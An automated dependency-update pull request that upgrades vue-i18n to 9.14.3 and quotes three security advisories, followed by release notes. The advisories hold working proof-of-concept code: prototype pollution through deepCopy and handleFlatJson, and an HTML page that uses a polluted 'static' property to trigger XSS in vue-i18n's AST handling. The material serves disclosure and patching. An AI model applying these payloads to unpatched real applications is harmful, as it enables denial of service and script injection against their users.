fix(deps): update dependency vue-i18n to v9.14.3 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vue-i18n (source)	9.9.1 -> 9.14.3

GitHub Vulnerability Alerts

CVE-2024-52810

Vulnerability type: Prototype Pollution

Affected Package:

Product: @​intlify/shared
Version: 10.0.4

Vulnerability Location(s):

node_modules/@​intlify/shared/dist/shared.cjs:232:26

Description:

The latest version of @intlify/shared (10.0.4) is vulnerable to Prototype Pollution through the entry function(s) lib.deepCopy. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @​intlify/[email protected]
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}

(async () => {
const lib = await import('@​intlify/shared');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for multiple functions, uncomment only one for each execution.
lib.deepCopy (JSON.parse('{"__proto__":{"pollutedKey":123}}'), someObj)
} catch (e) { }
console.log("After Attack: ", JSON.stringify({}.__proto__));
delete Object.prototype.pollutedKey;
})();

References

Prototype Pollution Leading to Remote Code Execution - An example of how prototype pollution can lead to command code injection.

OWASP Prototype Pollution Prevention Cheat Sheet - Best practices for preventing prototype pollution.

PortSwigger Guide on Preventing Prototype Pollution - A detailed guide to securing your applications against prototype pollution.

CVE-2024-52809

Vulnerability type

XSS

Description

vue-i18n can be passed locale messages to createI18n or useI18n.
we can then translate them using t and $t.
vue-i18n has its own syntax for local messages, and uses a message compiler to generate AST.
In order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as @intlify/unplugin-vue-i18n and bulder to convert the AST in advance when building the application.
By using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST.

The AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a static property, but that is just one of the optimizations.
About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts

In general, the locale messages of vue-i18n are optimized during production builds using @intlify/unplugin-vue-i18n,
so there is always a property that is attached during optimization like this time.
But if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects.

Reproduce (PoC)

<!doctype html>
<html>
  <head>
    <meta charset="utf-8" />
    <title>vue-i18n XSS</title>
    <script src="https://unpkg.com/vue@3"></script>
    <script src="https://unpkg.com/vue-i18n@10"></script>
    <!-- Scripts that perform prototype contamination, such as being distributed from malicious hosting sites or injected through supply chain attacks, etc. -->
    <script>
      /**
       * Prototype pollution vulnerability with `Object.prototype`.
       * The 'static' property is part of the optimized AST generated by the vue-i18n message compiler.
       * About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts
       *
       * In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,
       * so there is always a property that is attached during optimization like this time.
       * But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code.
       */
      Object.defineProperty(Object.prototype, 'static', {
        configurable: true,
        get() {
          alert('prototype polluted!')
          return 'prototype pollution'
        }
      })
    </script> 
 </head>
  <body>
    <div id="app">
      <p>{{ t('hello') }}</p>
    </div>
    <script>
      const { createApp } = Vue
      const { createI18n, useI18n } = VueI18n

      // AST style locale message, which build by `@intlify/unplugin-vue-i18n`
      const en = {
        hello: {
          type: 0,
          body: {
            items: [
              {
                type: 3,
                value: 'hello world!'
              }
            ]
          }
        }
      }

      const i18n = createI18n({
        legacy: false,
        locale: 'en',
        messages: {
          en
        }
      })

      const app = createApp({
        setup() {
          const { t } = useI18n()
          return { t }
        }
      })
      app.use(i18n)
      app.mount('#app')
    </script>
  </body>
</html>

Workarounds

Before v10.0.0, we can work around this vulnerability by using the regular compilation (jit: false of @intlify/unplugin-vue-i18n plugin configuration) way instead of jit compilation.

• jit compilation: https://vue-i18n.intlify.dev/guide/advanced/optimization.html#jit-compilation
• bundler plugin option: https://github.com/intlify/bundle-tools/tree/main/packages/unplugin-vue-i18n#jitcompilation

References

• Simillar case: Vue 2 XSS vulnerability with prototype pollution

CVE-2025-27597

Vulnerability type:
Prototype Pollution

Vulnerability Location(s):

# v9.1
node_modules/@​intlify/message-resolver/index.js

# v9.2 or later
node_modules/@​intlify/vue-i18n-core/index.js

Description:

The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @​intlify/[email protected]
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}

// poc.js
(async () => {
    const lib = await import('@​intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();

---

Release Notes

intlify/vue-i18n (vue-i18n)

v9.14.3

Compare Source

What's Changed

🔒 Security Fixes

• fix: prototype pollution in handleFlatJson, about details see GHSA-p2ph-7g93-hw3m

Full Changelog: intlify/vue-i18n@v9.14.2...v9.14.3

v9.14.2

Compare Source

What's Changed

🔒 Security Fixes

• fix: XSS vulnerability with prototype pollution on AST: GHSA-9r9m-ffp6-9x4v
• fix: prototype pollusion on deepCopy: GHSA-hjwq-mjwj-4x6c

Full Changelog: intlify/vue-i18n@v9.14.1...v9.14.2

v9.14.1

Compare Source

What's Changed

🐛 Bug Fixes

• fix: messages deepCopy mutates src arguments by @​BobbieGoede in https://github.com/intlify/vue-i18n/pull/1975

Full Changelog: intlify/vue-i18n@v9.14.0...v9.14.1

v9.14.0

Compare Source

What's Changed

⚡ Improvement Features

• fix: vue-i18n type definition for vue package by @​BobbieGoede in https://github.com/intlify/vue-i18n/pull/1919

Full Changelog: intlify/vue-i18n@v9.13.1...v9.14.0

v9.13.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix(message-compiler): cannot resolve none-identifier characters at linked key by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1813

Full Changelog: intlify/vue-i18n@v9.13.0...v9.13.1

v9.13.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

⚠️ Deprecated Features

• fix: EOL announcement warning for vue-i18n-bridge by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1800

⚡ Improvement Features

• fix: not throw warnings when using implicit fallback by @​ShinnosukeKomiya in https://github.com/intlify/vue-i18n-next/pull/1798

📝️ Documentations

• fix: spelling by @​DamageESP in https://github.com/intlify/vue-i18n-next/pull/1802
• docs: improve documentation by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1801
• docs: fix dead link on menu by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1804

New Contributors

• @​ShinnosukeKomiya made their first contribution in https://github.com/intlify/vue-i18n-next/pull/1798
• @​DamageESP made their first contribution in https://github.com/intlify/vue-i18n-next/pull/1802

Full Changelog: intlify/vue-i18n@v9.12.1...v9.13.0

v9.12.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: compile error for key with included hyphen in named interpolation by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1797

👕 Refactoring

• refactor: tokenizer by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1799

Full Changelog: intlify/vue-i18n@v9.12.0...v9.12.1

v9.12.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• fix: deprecate named interpolation with modulo syntax by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1795

Full Changelog: intlify/vue-i18n@v9.11.1...v9.12.0

v9.11.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: regression triple slash including in .d.ts by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1794

Full Changelog: intlify/vue-i18n@v9.11.0...v9.11.1

v9.11.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• fix: number and date format components not using scope prop by @​BobbieGoede in https://github.com/intlify/vue-i18n-next/pull/1786

New Contributors

• @​xuanzhi33 made their first contribution in https://github.com/intlify/vue-i18n-next/pull/1767
• @​YoshiYo made their first contribution in https://github.com/intlify/vue-i18n-next/pull/1781

Full Changelog: intlify/vue-i18n@v9.10.2...v9.11.0

v9.10.2

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

• fix: manually add triple slash directive to message-compiler by @​BobbieGoede in https://github.com/intlify/vue-i18n-next/pull/1766

New Contributors

• @​shinGangan made their first contribution in https://github.com/intlify/vue-i18n-next/pull/1763

Full Changelog: intlify/vue-i18n@v9.10.1...v9.10.2

v9.10.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

⚡ Improvement Features

• chore(fix): #​1630 make the install function synchronous to be aligned… by @​k-paxian in https://github.com/intlify/vue-i18n-next/pull/1631

📝️ Documentations

• docs: wrong te docs by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1753

New Contributors

• @​k-paxian made their first contribution in https://github.com/intlify/vue-i18n-next/pull/1631

Full Changelog: intlify/vue-i18n@v9.10.0...v9.10.1

v9.10.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

• fix: Support for te behavior compatibility before v9.6 by @​kazupon in https://github.com/intlify/vue-i18n-next/pull/1751

📝️ Documentations

• docs: update description of Nuxt I18n and its status by @​BobbieGoede in https://github.com/intlify/vue-i18n-next/pull/1739

New Contributors

• @​twolfvb made their first contribution in https://github.com/intlify/vue-i18n-next/pull/1732
• @​ismailarilik made their first contribution in https://github.com/intlify/vue-i18n-next/pull/1722

Full Changelog: intlify/vue-i18n@v9.9.1...v9.10.0

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[vercel]

The latest updates on your projects. Learn more about Vercel for Git ↗︎

Name	Status	Preview	Updated (UTC)
it-tools	✅ Ready (Inspect)	Visit Preview	Apr 8, 2025 10:43am

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud